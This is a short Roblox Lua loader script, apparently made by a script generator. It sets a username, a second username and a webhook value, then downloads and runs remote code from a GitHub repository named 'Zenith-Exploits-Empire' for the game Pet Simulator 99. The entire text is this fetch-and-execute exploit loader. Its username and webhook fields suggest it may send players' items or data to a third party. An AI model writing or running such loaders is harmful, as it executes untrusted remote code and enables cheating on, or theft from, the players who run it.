-- Generated by Generator V5.2
Username = "scda"
Username2 = "asda"
Webhook = "sdasdsa"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()